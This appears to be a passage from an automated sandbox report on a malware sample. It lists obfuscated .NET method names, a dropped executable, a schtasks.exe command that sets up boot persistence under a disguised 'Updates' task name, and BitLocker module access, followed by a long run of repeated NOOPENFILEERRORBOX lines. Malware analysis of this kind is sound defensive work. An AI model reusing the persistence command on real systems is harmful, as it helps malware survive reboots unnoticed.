Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, agAuJ8ltVMCIOf31qe.cs	High entropy of concatenated method names: 'dPA2GdZLEs', 'dRa2vAn7ao', 'Giv2E5xj6o', 'zDK2Qlu0Ly', 'L4B2dTaaL5', 'nTu2ODIU8C', 'pL02j7uvMd', 'ycY2H5GqK5', 'Rec2rwHf9f', 'gV52sGT6dq'
Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, QsKlaUZiwJH928fJXh0.cs	High entropy of concatenated method names: 'cBUSsZH9Ov', 'pDPSzvGHOE', 'V5kT10iu08', 'clCbGrdUUfvQpyAbtMH', 'rWjHe3dlg8dv2RmaKpv', 'LssAe7dqJoBlUpl8Phb', 'zs56Lhddks3fIXL3WWB'
Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, Moh2uvNIhrMD87MeqT.cs	High entropy of concatenated method names: 'A9gessma9', 'NuwFMhwtW', 'vUdbPE70d', 'qXORaTosP', 'JlpqsppOH', 'f2i8asUys', 'NuelMyMP3vo1YhE3tW', 'fGQ7q4Rf6HQm5KhGY2', 'f2pXTmbb6', 'jBVmJDpVO'
Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, pJJpnbhNcqddPKB5Gi.cs	High entropy of concatenated method names: 'xWripiBnyN', 'AwXiD1U5eW', 'sgxi2tGMry', 'UIciaqCmBq', 'VwfiVKNfHR', 'ORgiA7l7cG', 'imYi7GMxha', 'MtHihjarXP', 'vnyiPbd5ye', 'cGOifuYyps'
Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, zv9XvurHRAfCNDMw3O.cs	High entropy of concatenated method names: 'oqZBtwYVKB', 'sQUB9e50Jw', 'fxBBxyrbtB', 'DWLBUqcGb5', 'kBsB0Kj9Zc', 'POSBw5SZBO', 'pweB4Blh4C', 'CgbBoHiv3q', 'UWyBI2BeGp', 'UCWBgeJRqe'
Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, WQ8e1ROmWKFr3U75t8.cs	High entropy of concatenated method names: 'uJauH0C2h8', 'TsWusgEtD9', 'DI7X1KGJMX', 'esbXZIsrtY', 'vUCu6JWBD7', 'PGvukKySCG', 'QoruKgc0FE', 'KSyuGg7FuK', 'fTLuvuUQQ7', 'PPZuEHgkaa'
Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, tA0wcJIu0fB0vDCBxQ.cs	High entropy of concatenated method names: 'ORl7JTgW9j', 'xHU73OKyhx', 'UQK7erdc6t', 'mF77Fp8c6D', 'hoa7YLEDlO', 'H6a7ba09XU', 'jkJ7RbvNBG', 'Ggb7l57kCm', 'c1H7qDVECo', 'ttl78GkciO'
Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, cxeQw3G2l0Hu03P5VQ.cs	High entropy of concatenated method names: 'sHlCgPZ8NY', 'lsBCkIVwcW', 'KWXCGf1M8A', 'rT6Cv4nunY', 'hFVC96rTiF', 'BHgCxaRPq8', 'rxnCUPF4Dq', 'vNYC03t7Qg', 'qvlCw7aJA9', 'UYiC4YVYo8'
Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, R5769LjfVZiEvqo41d.cs	High entropy of concatenated method names: 'wO5BCG6PJ5', 'pjDBuRonN3', 'tBqBBS5K53', 'R3vBSZfKi7', 'uVPBWMrrs4', 'xBiBnJ5Vri', 'Dispose', 'Vg1XDjQX3D', 'G3TX2RG9Sj', 'z44XafrPIq'
Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, k2poIMQ64WqeCK4xGt.cs	High entropy of concatenated method names: 'tNAufaZk4o', 'g7guLw3Qty', 'ToString', 's2HuDvEYWi', 'gwfu2BiFOS', 'xvvuaZSRaw', 'WFfuVnnTm1', 'CwKuACAQV8', 'Kpru7STNI4', 'J68uhVgBbS'
Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, Oa6Ics9ceFiUpsBSSN.cs	High entropy of concatenated method names: 'KerRTmUwmc3bL2JVrKS', 'tYGss4USNJUSWT6TH8j', 'NIqAXFHryD', 'mZrABM9tj2', 'f4ZAmF0LlA', 'LbHwQVUnW1ECiJo9NBA', 'rInNFPUhhog0fcQKZ7l'

Source: C:\Users\user\Desktop\ckHregxJIq.exe

File created: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\ckHregxJIq.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpD0A2.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
